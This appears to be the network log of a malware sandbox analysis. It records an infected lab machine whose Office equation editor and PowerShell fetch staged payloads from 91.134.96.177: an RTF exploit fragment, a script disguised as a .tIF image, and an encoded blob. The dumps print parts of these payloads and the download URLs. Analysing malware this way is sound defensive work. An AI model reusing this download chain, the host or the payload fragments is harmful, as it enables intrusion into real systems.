                                                                                                                                                                                                Sep 30, 2024 16:24:22.250788927 CEST1236INData Raw: 32 5b 31 5e 34 2a 7c 30 5d 5b 37 60 33 25 24 3f 2e a7 37 28 30 3c 5d 5e a7 38 21 31 38 26 5b 3b 2c 7e 32 34 33 2d 3a 34 39 21 27 23 21 b5 25 30 40 28 2b b0 38 2e 3b 32 60 3f 3f 29 3f 3e 30 32 23 2a 36 25 3f 26 3f 2c 40 5e 2d 37 5d 29 39 26 2e 3e
                                                                                                                                                                                                Data Ascii: 2[1^4*|0][7`3%$?.7(0<]^8!18&[;,~243-:49!'#!%0@(+8.;2`??)?>02#*6%?&?,@^-7])9&.>?.+#[0;4|04?$~+|43/?_;(@-*^^<5+3;>]%8*]81_-[?=0;&*@<,#.0$,`-^6`;[#?%#_`.'$?&(??064?%6),2$#(*%-2/.`?:?+?[>^31]~>2=+%-?^`~.'2;5&)~05*.4^75]??8<?^*-4&[[~
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250837088 CEST1236INData Raw: 31 24 2d a7 39 3c 23 37 35 38 34 38 24 b0 3f 5e 38 37 36 3f 27 39 3f 60 36 5f 25 5b 3f 34 39 60 7e 3d 7e 3f 3d 28 2b 3f 37 37 28 27 2f 60 60 2a 3f 36 5d 3a 3a 3f 3f 2d 27 b0 40 38 5d 3f 39 38 35 3b 3d b5 23 34 5b 3f 31 5e 39 60 21 3e 40 21 5e 7c
                                                                                                                                                                                                Data Ascii: 1$-9<#75848$?^876?'9?`6_%[?49`~=~?=(+?77('/``*?6]::??-'@8]?985;=#4[?1^9`!>@!^|61!?6$+??4?`*?7(7].?$/-[?[?-1=%@#`:_~5@[&~?2?(~'9@#~:;1<~]?3,,?6*740>+?1@`>17&!&5*:3-?%34=@!&-328=1;35@%?2?4?@7~].3>5_'#6<2^^:&1?_8_%:.-.[<`,/:~`(@40]?`
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250849009 CEST1236INData Raw: 33 3f 3f 21 2e 3b 37 31 40 23 30 26 23 40 33 3f 7e 3e b0 26 60 2b 34 3b 31 3c 2c 38 5b 38 32 5b 21 36 b0 3f 3f 3b 7e 25 26 28 39 21 5d 27 5f 2d 33 25 3a 5d 2f 3c 2a 3c 3b 5d b0 5f 29 2f 25 3b 23 25 26 25 37 38 26 3f 23 26 40 a7 5e 36 7e 23 28 32
                                                                                                                                                                                                Data Ascii: 3??!.;71@#0&#@3?~>&`+4;1<,8[82[!6??;~%&(9!]'_-3%:]/<*<;]_)/%;#%&%78&?#&@^6~#(22~)<9!6+3?_1$5><-@.*?(?#)!]?]6?4:-+$%?,_;4>?&?:30%@'139&|,58+%?*)';~:;07?|,6-#~=80*.*<:`,8[$[&57?)-%./,&4~<-![6?5`*,#6,#:?:#9%>`?2%?!4',(`5*##[%5%|4(|~
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250859976 CEST1236INData Raw: 3f 7e 34 3b 3c 25 b5 60 3a 29 21 37 25 34 36 3b 2c 37 35 3f 21 38 3f 2b 3f 2e 33 2b 25 3c 24 3f 3e 2d 26 3e a7 3f 60 28 25 3f 39 3f 3e 3e 34 2a 7c 3a 7c 26 32 35 37 5f 23 5f 5b 34 25 28 40 3d 60 31 3c 39 b0 25 2f 21 b0 34 28 27 35 3c 33 5e 40 a7
                                                                                                                                                                                                Data Ascii: ?~4;<%`:)!7%46;,75?!8?+?.3+%<$?>-&>?`(%?9?>>4*|:|&257_#_[4%(@=`1<9%/!4('5<3^@3|5*?6~%^>!&9['7<?*-@]<0/#7.]4+9?9'3:0:=0(:@?$`1?_?7?![_6`%0)%~&,2!_+|9?>@-/?..'772%%]+<7-<,^?>||;;@&%8-4??[0.:82_%2=7?17&1:],^<%7?_?:`=]`_,?:?(%5(?)?;09)2>>_
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250870943 CEST1236INData Raw: 7c 3d 38 7e 40 24 35 5e 29 7e 2c 36 3a 31 2e 3a 25 37 40 30 b0 38 38 32 2b 3f 5b 28 28 40 24 27 5b 37 3c b5 3a 32 b0 3e 36 25 31 3f 5d 37 27 b5 3f 3f 36 60 26 34 34 23 32 35 28 25 3f 2d 39 2b 28 3f 32 3f 26 7e 26 37 2e a7 29 b0 2a 30 25 a7 30 39
                                                                                                                                                                                                Data Ascii: |=8~@$5^)~,6:1.:%7@0882+?[((@$'[7<:2>6%1?]7'??6`&44#25(%?-9+(?2?&~&7.)*0%097[)19.[5*%!=2%;825*?4*?4`-%85+(/+?^%`'/777?%)?=!;3?(639?$<!?2?&:9$*8??1&?9/?4=478>>'|1%%1+,8)3%+`/[:%6|#7+`?3]%%@?<)?%5>^)9%)1(?*61|@2?-?6^>/%2'?[67
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250881910 CEST1236INData Raw: a7 23 2e 60 7e 24 2f 40 7c 7e 3c 2c 2c 3f 3b 5e 3c 2e 7e 5b 38 2b 7c 29 38 24 2a 25 60 38 40 35 3f b5 a7 3c 29 36 3d 2f 5e 24 26 2d 3f 29 3f 60 60 3c 32 b0 25 39 3f 21 5e 2e 32 3e 2b 7e a7 35 3a 60 38 21 7e 5b 25 a7 31 34 23 39 7c 27 24 7e 2a a7
                                                                                                                                                                                                Data Ascii: #.`~$/@|~<,,?;^<.~[8+|)8$*%`8@5?<)6=/^$&-?)?``<2%9?!^.2>+~5:`8!~[%14#9|'$~*&%]?)?~?^*`33-/+*?[?+35<|(!=!6&<?^8?,-?1()(@+:~`(!/)9[!:??:*~9!`$??972/??%?48+333,]^|8?&^:0&7#7~'=6#0;+[?[=_0/?..?*#?67!?<'['|%)?74->>4_$?%;3)+_$3%7`(;
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250894070 CEST1236INData Raw: 38 35 31 5c 27 dd 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: 851\' {\object\ms
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250904083 CEST1236INData Raw: 0d 0d 0d 0d 0d 0a 0a 0d 0d 0a 0d 0a 0d 0a 0d 0a 0a 0a 0a 0a 35 31 09 09 20 20 09 20 09 09 09 20 20 20 20 20 09 09 20 09 09 20 20 20 20 09 20 09 20 20 09 20 20 20 09 20 09 20 09 09 09 20 20 20 20 20 09 09 20 20 20 09 20 09 20 20 09 09 09 20 09 20
                                                                                                                                                                                                Data Ascii: 51 754154
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250916958 CEST1236INData Raw: 09 09 09 09 20 09 09 09 09 20 09 20 09 09 20 09 09 09 20 20 20 20 09 20 09 20 09 20 09 09 09 09 20 20 09 09 30 0d 0d 0a 0a 0d 0d 0a 0a 0a 0d 0d 0d 0d 0a 0d 0a 0a 0a 0d 0a 0d 0a 0d 0a 0a 0d 0a 0d 0d 0a 0a 30 0d 0d 0a 0a 0d 0d 0a 0a 0a 0d 0d 0d 0d
                                                                                                                                                                                                Data Ascii: 000 00
                                                                                                                                                                                                Sep 30, 2024 16:24:22.256484985 CEST1236INData Raw: 0d 0d 0a 0d 0a 0a 0a 0d 0d 0d 0d 0a 0d 0d 0d 0d 0d 0d 0a 0a 0d 0a 0d 0a 0a 0a 66 36 0a 0d 0a 0a 0a 0a 0d 0a 0a 0a 0d 0d 0a 0d 0a 0d 0d 0a 0d 0a 0d 0d 0d 0d 0a 0d 0a 0d 0d 0a 0a 32 64 20 09 09 20 20 20 09 09 09 09 09 20 20 20 20 09 09 09 20 09 20
                                                                                                                                                                                                Data Ascii: f62d 3 d
                                                                                                                                                                                                Sep 30, 2024 16:24:24.098367929 CEST286OUTHEAD /80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc HTTP/1.1
                                                                                                                                                                                                User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                                Host: 91.134.96.177
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Sep 30, 2024 16:24:24.271703005 CEST322INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Mon, 30 Sep 2024 14:24:24 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                Last-Modified: Mon, 30 Sep 2024 06:43:59 GMT
                                                                                                                                                                                                ETag: "1c3d2-62350879de951"
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Content-Length: 115666
                                                                                                                                                                                                Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: application/msword


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                1192.168.2.224917191.134.96.177803744C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Sep 30, 2024 16:24:26.663450956 CEST347OUTGET /80/picturewithherimagesverygoodforyourheart.tIF HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                Host: 91.134.96.177
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260016918 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Mon, 30 Sep 2024 14:24:27 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                Last-Modified: Mon, 30 Sep 2024 06:41:22 GMT
                                                                                                                                                                                                ETag: "3c504-623507e3e561a"
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Content-Length: 247044
                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: image/tiff
                                                                                                                                                                                                Data Raw: ff fe 4c 00 6c 00 69 00 6b 00 4e 00 6b 00 66 00 52 00 65 00 43 00 71 00 43 00 4b 00 4c 00 55 00 42 00 47 00 65 00 75 00 63 00 66 00 7a 00 66 00 50 00 20 00 3d 00 20 00 22 00 47 00 4c 00 49 00 6c 00 69 00 66 00 4c 00 55 00 41 00 57 00 6e 00 70 00 68 00 6b 00 47 00 55 00 78 00 41 00 63 00 42 00 4b 00 41 00 4c 00 69 00 22 00 0d 00 0a 00 69 00 66 00 47 00 74 00 4c 00 4b 00 57 00 57 00 55 00 43 00 47 00 50 00 6d 00 4e 00 6d 00 67 00 61 00 6b 00 69 00 7a 00 6f 00 4f 00 57 00 43 00 20 00 3d 00 20 00 22 00 65 00 52 00 4b 00 74 00 57 00 75 00 43 00 47 00 57 00 4b 00 57 00 4b 00 42 00 63 00 4f 00 50 00 6a 00 69 00 50 00 57 00 4f 00 4c 00 6c 00 69 00 22 00 0d 00 0a 00 4b 00 57 00 78 00 7a 00 4c 00 66 00 6b 00 41 00 66 00 4e 00 6d 00 54 00 66 00 57 00 61 00 4c 00 66 00 67 00 54 00 63 00 4f 00 69 00 68 00 69 00 20 00 3d 00 20 00 22 00 4c 00 47 00 4f 00 7a 00 6d 00 42 00 41 00 6a 00 47 00 4c 00 6c 00 51 00 47 00 57 00 6f 00 68 00 66 00 7a 00 57 00 57 00 6b 00 50 00 55 00 73 00 22 00 0d 00 0a 00 43 00 57 00 5a 00 [TRUNCATED]
                                                                                                                                                                                                Data Ascii: LlikNkfReCqCKLUBGeucfzfP = "GLIlifLUAWnphkGUxAcBKALi"ifGtLKWWUCGPmNmgakizoOWC = "eRKtWuCGWKWKBcOPjiPWOLli"KWxzLfkAfNmTfWaLfgTcOihi = "LGOzmBAjGLlQGWohfzWWkPUs"CWZpGAblBWhRdKvcNWWhcoAT = "oUaUeWhWcKCTcIdcqahUaRhB"iLUxdzmLuiqxccALCvNcioUA = "GWcNPfNKomLUPJZhOdppCoiK"cLtUNcCxeWZdBTpgULZWqbUK = "OKWWpWloKLfWAPzkUeLLURmW"iuKsxshJcKBnGkmmrGHlChNq = "GkcfUkWihzRzGGCLCUcZPGiW"WuiLKfaWWcGZWZJfIPCZOfhN = "aNbKKbfkWLKzKuCpWRmNfLWL"LqmPKzvmAKGWNNWGAlLi
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260081053 CEST1236INData Raw: 00 6f 00 57 00 41 00 6b 00 20 00 3d 00 20 00 22 00 73 00 53 00 5a 00 49 00 63 00 69 00 57 00 4b 00 4c 00 4b 00 4f 00 4c 00 6f 00 57 00 4e 00 62 00 4b 00 43 00 55 00 4c 00 6b 00 74 00 71 00 64 00 22 00 0d 00 0a 00 64 00 51 00 7a 00 4f 00 78 00 64
                                                                                                                                                                                                Data Ascii: oWAk = "sSZIciWKLKOLoWNbKCULktqd"dQzOxdzoLkcWcqKeCLqWiecK = "RgNKkecUKLjWbLrdSLAtTxPq"mkNHHLLApciqShioGkeRdWiG = "U
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260114908 CEST1236INData Raw: 00 54 00 47 00 63 00 41 00 6b 00 52 00 41 00 4c 00 4c 00 6b 00 4c 00 62 00 57 00 57 00 66 00 65 00 63 00 4b 00 57 00 73 00 76 00 22 00 0d 00 0a 00 0d 00 0a 00 64 00 62 00 4e 00 6d 00 48 00 43 00 68 00 5a 00 4f 00 70 00 52 00 4c 00 4b 00 74 00 63
                                                                                                                                                                                                Data Ascii: TGcAkRALLkLbWWfecKWsv"dbNmHChZOpRLKtcUZbCfTLNl = "ZCkhGuupoLWUWimLlcBrkWUh"KjisHPKqLBRcctbKxPiLiWLd = "WpIkWGWGGgkm
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260150909 CEST672INData Raw: 00 70 00 67 00 53 00 63 00 6e 00 62 00 66 00 4f 00 6c 00 53 00 70 00 54 00 57 00 6b 00 6b 00 4b 00 5a 00 22 00 0d 00 0a 00 61 00 6f 00 5a 00 51 00 5a 00 65 00 4c 00 65 00 4c 00 6c 00 70 00 50 00 64 00 4c 00 61 00 72 00 4c 00 64 00 49 00 57 00 71
                                                                                                                                                                                                Data Ascii: pgScnbfOlSpTWkkKZ"aoZQZeLeLlpPdLarLdIWqBim = "eGobhrccWbNNBhhKZaPWbkGR"KbqbevifjOIrhOxiTaeWcziq = "WzeaWIepGprfxZNcgb
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260188103 CEST1236INData Raw: 00 62 00 4f 00 70 00 7a 00 70 00 55 00 69 00 4f 00 68 00 47 00 69 00 22 00 0d 00 0a 00 66 00 41 00 57 00 74 00 63 00 49 00 57 00 6f 00 41 00 52 00 69 00 49 00 6f 00 4c 00 50 00 4e 00 43 00 68 00 4c 00 6f 00 57 00 4f 00 65 00 54 00 20 00 3d 00 20
                                                                                                                                                                                                Data Ascii: bOpzpUiOhGi"fAWtcIWoARiIoLPNChLoWOeT = "WUpGBKPpWaGiamLlLbWKfQfq"WxgamfCQGLUWekttLLBkLiON = "CWaIePgcelWjfokZWUSZhLAi
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260221004 CEST1236INData Raw: 00 22 00 0d 00 0a 00 55 00 4c 00 57 00 57 00 52 00 74 00 5a 00 65 00 5a 00 69 00 57 00 6f 00 57 00 6d 00 53 00 65 00 4c 00 4c 00 4b 00 78 00 65 00 57 00 5a 00 69 00 20 00 3d 00 20 00 22 00 68 00 63 00 47 00 57 00 4b 00 6b 00 6f 00 57 00 4b 00 71
                                                                                                                                                                                                Data Ascii: "ULWWRtZeZiWoWmSeLLKxeWZi = "hcGWKkoWKqLiKRHoqclZWiTh"GxLGxWcWiRNWjALtdbxQmuOh = "tWWmunUbzlaivWGbzPBcWarf"tokgvL
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260256052 CEST1236INData Raw: 00 65 00 62 00 4c 00 61 00 6f 00 52 00 63 00 6e 00 7a 00 5a 00 76 00 4b 00 57 00 55 00 4b 00 5a 00 20 00 3d 00 20 00 22 00 52 00 4e 00 63 00 69 00 55 00 65 00 62 00 70 00 70 00 78 00 4b 00 69 00 7a 00 41 00 6b 00 76 00 6d 00 4b 00 69 00 55 00 57
                                                                                                                                                                                                Data Ascii: ebLaoRcnzZvKWUKZ = "RNciUebppxKizAkvmKiUWLGO"nqxlRdpZLmCbTRPNvLJfAUcb = "WaibcikeGotpgAWIiiWomWBW"NuiAihLhpKdLclfhkLW
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260288954 CEST1236INData Raw: 00 4c 00 68 00 57 00 68 00 67 00 71 00 4a 00 74 00 70 00 78 00 20 00 3d 00 20 00 22 00 70 00 55 00 4c 00 47 00 70 00 75 00 4a 00 4b 00 4f 00 76 00 41 00 42 00 68 00 74 00 7a 00 4e 00 6c 00 68 00 4b 00 66 00 61 00 74 00 49 00 6d 00 22 00 0d 00 0a
                                                                                                                                                                                                Data Ascii: LhWhgqJtpx = "pULGpuJKOvABhtzNlhKfatIm"gzaKGJxoGkrGeKLPzixGnKiQ = "cLkLWifbkhestLcpiRbzaKGe"nGkGQvKAWpiUhbuLhcCcLPSv
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260323048 CEST1236INData Raw: 00 4c 00 71 00 63 00 7a 00 20 00 3d 00 20 00 22 00 52 00 69 00 4b 00 57 00 75 00 63 00 4c 00 4e 00 62 00 41 00 57 00 6b 00 4c 00 6e 00 73 00 6f 00 4c 00 4c 00 74 00 63 00 69 00 43 00 69 00 4b 00 22 00 0d 00 0a 00 50 00 6e 00 69 00 55 00 68 00 4c
                                                                                                                                                                                                Data Ascii: Lqcz = "RiKWucLNbAWkLnsoLLtciCiK"PniUhLWGoqiHonzGPpRZsLWt = "LdbvfiLbzRWNxZoJUUccgkfg"ChonzenarvGoGNeKKZpSHPpnnhBdx =
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260359049 CEST1236INData Raw: 00 52 00 70 00 4c 00 20 00 3d 00 20 00 22 00 6d 00 41 00 57 00 54 00 53 00 67 00 47 00 6d 00 43 00 4c 00 6f 00 6c 00 57 00 42 00 52 00 49 00 57 00 52 00 4c 00 71 00 52 00 6c 00 69 00 57 00 22 00 0d 00 0a 00 66 00 65 00 4b 00 69 00 6f 00 4e 00 71
                                                                                                                                                                                                Data Ascii: RpL = "mAWTSgGmCLolWBRIWRLqRliW"feKioNqWOiLTLmvKiuAGLhKC = "pzGWARPUGzoAtelbdfeWhGWr"zWbzjdPhWqcWfUWNAkZcbZsL = "zJKt
                                                                                                                                                                                                Sep 30, 2024 16:24:27.266427994 CEST1236INData Raw: 00 4c 00 57 00 20 00 3d 00 20 00 22 00 62 00 4c 00 69 00 7a 00 41 00 64 00 57 00 57 00 66 00 4c 00 43 00 62 00 68 00 64 00 70 00 57 00 7a 00 4e 00 4b 00 69 00 7a 00 41 00 51 00 4c 00 22 00 0d 00 0a 00 6f 00 43 00 6b 00 48 00 41 00 57 00 6b 00 4c
                                                                                                                                                                                                Data Ascii: LW = "bLizAdWWfLCbhdpWzNKizAQL"oCkHAWkLAULiGpBGqBRARccA = "KopTLmZGtmGGiGCmWLmkQfip"LtGLvGdxKaRhKKHkWvPPzLcm = "kLGfL


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                2192.168.2.224917391.134.96.177803952C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Sep 30, 2024 16:24:35.680459023 CEST76OUTGET /80/WRRDFC.txt HTTP/1.1
                                                                                                                                                                                                Host: 91.134.96.177
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Sep 30, 2024 16:24:36.270281076 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Mon, 30 Sep 2024 14:24:36 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                Last-Modified: Mon, 30 Sep 2024 06:38:44 GMT
                                                                                                                                                                                                ETag: "a1000-6235074c9d7b5"
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Content-Length: 659456
                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                                                                                                                                                                Sep 30, 2024 16:24:36.270299911 CEST224INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                                                                                                                                                                Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1
                                                                                                                                                                                                Sep 30, 2024 16:24:36.270309925 CEST1236INData Raw: 41 56 4e 4d 56 44 53 31 67 54 4e 30 55 44 4a 31 77 51 4e 45 55 44 41 30 77 50 4e 34 54 44 36 30 51 4f 4e 55 54 44 76 30 51 4c 4e 77 53 44 72 30 77 4a 4e 59 53 44 69 30 41 48 4e 6f 52 44 5a 30 51 46 4e 51 52 44 51 30 67 43 4e 67 51 44 48 30 77 41
                                                                                                                                                                                                Data Ascii: AVNMVDS1gTN0UDJ1wQNEUDA0wPN4TD60QONUTDv0QLNwSDr0wJNYSDi0AHNoRDZ0QFNQRDQ0gCNgQDH0wANIMD8zw+MoPD5zA9MIPDxAAQAcBgBQDQOokDJAAAAMAgBADAAA0D8AAAAMAgBwCAOwjD64QJOQiDj4gFO4gDF3w/N4fD63A9NYeDi3w2NodDS3Q0NAdDPAAAAwAgBQCgNAZDP1AcN8WDu1QbNwWDr1gaNcWDm1QZN
                                                                                                                                                                                                Sep 30, 2024 16:24:36.270318985 CEST1236INData Raw: 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44
                                                                                                                                                                                                Data Ascii: nDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfDx3w7N0eDr3Q6NceDl3w4NEeDf3Q3NsdDZ3w1NUdDT3Q0N8cDN3wyNkcDH3QxNMcDB2wvN0bD7
                                                                                                                                                                                                Sep 30, 2024 16:24:36.270330906 CEST1236INData Raw: 77 6e 4f 34 70 44 64 36 41 6e 4f 73 70 44 61 36 51 6d 4f 67 70 44 58 36 67 6c 4f 55 70 44 55 36 77 6b 4f 49 70 44 52 36 41 6b 4f 38 6f 44 4f 36 51 6a 4f 77 6f 44 4c 36 67 69 4f 6b 6f 44 49 36 77 68 4f 59 6f 44 46 36 41 68 4f 4d 6f 44 43 36 51 67
                                                                                                                                                                                                Data Ascii: wnO4pDd6AnOspDa6QmOgpDX6glOUpDU6wkOIpDR6AkO8oDO6QjOwoDL6giOkoDI6whOYoDF6AhOMoDC6QgOAkD/5gfO0nD85weOonD55AeOcnD25QdOQnDz5gcOEnDw5wbO4mDt5AbOsmDq5QaOgmDn5gZOUmDk5wYOImDh5AYO8lDe5QXOwlDX5gVOUlDU4QGOghDX4gFAAAA4AUAwAAAA1AdNIXDw1gbNwWDq1AaNYWDk1gYN
                                                                                                                                                                                                Sep 30, 2024 16:24:36.270351887 CEST1236INData Raw: 6b 44 2f 35 51 66 4f 73 6e 44 35 35 77 64 4f 55 6e 44 7a 35 51 63 4f 38 6d 44 74 35 77 61 4f 6b 6d 44 6e 35 51 5a 4f 4d 6d 44 68 35 77 58 4f 30 6c 44 62 35 51 57 4f 63 6c 44 56 35 77 55 4f 45 6c 44 50 35 51 54 4f 73 6b 44 4a 35 77 52 4f 55 6b 44
                                                                                                                                                                                                Data Ascii: kD/5QfOsnD55wdOUnDz5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD94wOOkjD34QNOMjDx4wLO0iDr4QKOciDl4wIOEiDf4QHOshDZ4wFOUhDT4QEO8gDN4wCOkgDH4QBOMgDB3w/N0fD73Q+NcfD13w8NEfDv3Q7NseDp3w5MAPDvzg7M0ODszw6MoODpzA6McODmzQ5MQODj
                                                                                                                                                                                                Sep 30, 2024 16:24:36.270361900 CEST1236INData Raw: 6f 39 50 77 2b 54 61 2f 6b 30 50 39 38 54 4d 2f 30 78 50 52 34 7a 72 2b 63 71 50 4a 36 54 67 2b 6b 6e 50 78 35 54 61 2b 6f 52 50 2b 7a 54 63 38 63 47 50 39 77 44 4d 37 34 38 4f 39 75 7a 74 37 49 37 4f 73 75 6a 6a 37 55 34 4f 38 74 7a 5a 36 4d 75
